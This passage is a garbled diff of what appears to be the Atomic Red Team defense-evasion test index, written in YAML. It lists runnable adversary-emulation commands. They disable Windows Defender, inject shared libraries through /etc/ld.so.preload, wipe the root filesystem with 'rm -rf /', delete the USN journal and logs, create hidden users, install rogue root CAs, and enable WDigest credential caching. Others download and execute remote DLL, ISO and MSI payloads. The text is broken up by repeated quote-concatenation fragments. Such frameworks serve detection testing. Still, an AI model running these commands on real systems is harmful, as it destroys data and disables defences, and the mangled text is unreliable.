'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -' + ' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -' + ' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. -' + ' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. -' + ' supported_platforms: - windows input_arguments: 
@@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. -' + ' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed -' + ' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). -' + ' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureADPreview -Force -' + ' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
@@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory -' + ' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} -' + ' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it -' + ' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} -' + ' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it -' + ' supported_platforms: - linux input_arguments: 
@@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} -' + ' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} -' + ' executor: command: 'del /f #{file_to_delete} -' + ' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'mkdir #{folder_to_delete} -' + ' executor: command: 'rmdir /s /q #{folder_to_delete} -' + ' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null -' + ' executor: command: 'Remove-Item -path #{file_to_delete} -' + ' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 
@@ -27476,7 +27476,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -27490,18 +27490,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null -' + ' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse -' + ' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -27509,13 +27509,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -' + ' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null -' + ' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -27528,7 +27528,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) -' + ' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -27552,18 +27552,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) -' + ' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null -' + ' executor: command: 'Remove-Item #{teamviewer_log_file} -' + ' name: powershell T1222: technique: @@ -27708,7 +27708,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line -' + ' supported_platforms: - macos input_arguments: 
@@ -27719,7 +27719,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} -' + ' elevation_required: true name: sh T1484.001: @@ -27947,7 +27947,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory -' + ' supported_platforms: - linux - macos @@ -27957,20 +27957,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ -' + ' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS -' + ' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" -' + ' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -27988,20 +27988,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +s #{file_to_modify} -' + ' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib 
@@ -28020,27 +28020,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +h #{file_to_modify} -' + ' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools -' + ' supported_platforms: - macos input_arguments: @@ -28051,13 +28051,13 @@ defense-evasion: executor: command: 'setfile -a V #(unknown) -' + ' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS -' + ' supported_platforms: - macos executor: @@ -28066,22 +28066,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt -' + ' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS -' + ' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES -' + ' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO -' + ' name: sh T1564.002: technique: @@ -28129,7 +28129,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) -' + ' supported_platforms: - macos input_arguments: 
@@ -28140,17 +28140,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin -' + ' supported_platforms: - macos input_arguments: @@ -28161,10 +28161,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh T1564.003: @@ -28246,7 +28246,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} -' + ' name: powershell T1564: technique: @@ -28330,7 +28330,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -28340,7 +28340,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -28350,7 +28350,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore -' + ' name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells -' + ' supported_platforms: - linux - macos 
@@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files -' + ' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. -' + ' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: -' + ' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: -' + ' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} -' + ' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" -' + ' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} 
@@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl -' + ' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" -' + ' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell -' + ' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil -' + ' supported_platforms: - windows input_arguments: 
@@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} -' + ' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: 
@@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. -' + ' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" 
@@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. -' + ' supported_platforms: - macos - linux 
@@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. -' + ' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. -' + ' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} -' + ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} -' + ' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. -' + ' supported_platforms: - windows input_arguments: 
@@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#(unknown)) -' + ' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ -' + ' supported_platforms: - windows input_arguments: 
@@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" -' + ' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null -' + ' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) -' + ' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } -' + ' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} -' + ' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' -' + ' name: powershell T1036.004: technique: 
@@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f -' + ' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times -' + ' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) -' + ' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f -' + ' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f -' + ' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f -' + ' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone 
@@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" -' + ' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) -' + ' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own MSI" -' + ' executor: command: 'msiexec.exe /q /i "#{msi_payload}" -' + ' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. -' + ' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 